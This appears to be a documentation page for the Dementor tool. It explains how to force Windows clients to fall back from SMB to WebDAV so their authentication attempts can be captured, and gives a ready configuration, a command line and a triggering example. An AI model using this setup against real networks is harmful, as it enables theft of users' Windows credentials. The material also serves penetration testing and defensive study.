WebDAV Fallback¶
See also
For a more detailed explanation of this attack, please refer to this excellent article from Synacktiv: Tricking Windows SMB clients into falling back to WebDav.
Windows clients with the WebDAV redirector installed can be tricked into authenticating against a WebDAV server if SMB access fails. Note that QUIC must also be disabled, as it takes precedence over WebDAV. The protocol resolution order on Windows is:
SMB (Port 445)
QUIC (Port 443)
WebDAV (Port 80, if the WebDAV Redirector service is active)
To leverage this behavior, modify the configuration for Dementor as shown below:
1[Dementor]
2# [...]
3SMB = true
4HTTP = true
5# [...]
6QUIC = false
7
8[SMB]
9# [...]
10ErrorCode = "STATUS_BAD_NETWORK_NAME"
11
12[HTTP]
13# Make sure WebDAV support is enabled
14WebDAV = true
$ Dementor -I "$INTERFACE" \
-O QUIC=Off \
-O SMB.ErrorCode="STATUS_BAD_NETWORK_NAME" \
-O HTTP.WebDAV=On
Note
If you’re using per-server configurations for SMB or HTTP, you must adjust those attributes individually within each server block.
Triggering the Fallback¶
To trigger the fallback behavior, simply attempt to list files from a nonexistent or inaccessible SMB share:
C:\Users\Administrator> dir \\FILESRV01\internal
The specified network name is no longer available.
In this scenario, the Windows client will first attempt to authenticate via SMB, fail with the specified error, and then fall back to WebDAV. If Dementor will capture authentication attempts from both SMB and WebDAV services.
Specific error codes trick Windows clients into using WebDAV as a fallback mechanism.¶